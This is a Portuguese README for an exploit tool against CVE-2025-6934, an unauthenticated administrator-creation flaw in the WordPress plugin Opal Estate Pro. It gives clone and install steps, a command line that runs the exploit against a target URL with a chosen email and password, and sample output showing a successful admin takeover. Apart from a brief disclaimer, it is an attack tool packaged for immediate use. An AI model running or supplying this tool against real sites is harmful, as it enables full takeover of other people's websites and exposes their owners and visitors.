
Ferramenta de Exploit CVE-2025-6934 para Criação Não Autenticada de Conta de Administrador no Plugin WordPress Opal Estate Pro
Criado e desenvolvido totalmente por mejbankadir (SMH tech e Mejban HackSheild Sob NexoAmicus)
CVE-2025-6934 é uma vulnerabilidade crítica no plugin Opal Estate Pro do WordPress (versões <= 1.7.5) que permite que atacantes não autenticados criem contas de administrador em sites WordPress vulneráveis.
Esta ferramenta oferece versões CLI (Interface de Linha de Comando) e GUI (Interface Gráfica do Usuário) para explorar esta vulnerabilidade.
| Atributo | Valor |
|---|---|
| ID do CVE | CVE-2025-6934 |
| Gravidade | Crítica (CVSS 3.1: 9.8) |
| Plugin Afetado | Opal Estate Pro |
| Versões Afetadas | <= 1.7.5 |
| Tipo de Vulnerabilidade | Criação de Conta de Administrador Não Autenticada |
| Vetor CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
python3 CVE-2025-6934-GUI.py
Recursos da GUI:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
Argumentos:
-u, --url Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ AVISO: Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.
O acesso não autorizado a sistemas de computadores é ilegal e antiético.
Ao usar esta ferramenta, você concorda em:
- Testar apenas sistemas que você possui ou para os quais tem permissão explícita
- Não usar esta ferramenta para fins maliciosos
- Assumir toda a responsabilidade por quaisquer consequências legais
| Função | Nome |
|---|---|
| Criador e Desenvolvedor | mejbankadir |
| Organização | SMH tech & Mejban HackSheild Sob NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
A ferramenta desativa automaticamente os avisos de SSL. Se você encontrar problemas:
requests.packages.urllib3.disable_warnings()
Licença MIT
Copyright (c) 2025 mejbankadir (SMH tech e Mejban HackSheild Sob NexoAmicus)
Feito com ❤️ por mejbankadir
SMH tech | Mejban HackSheild | Sob NexoAmicus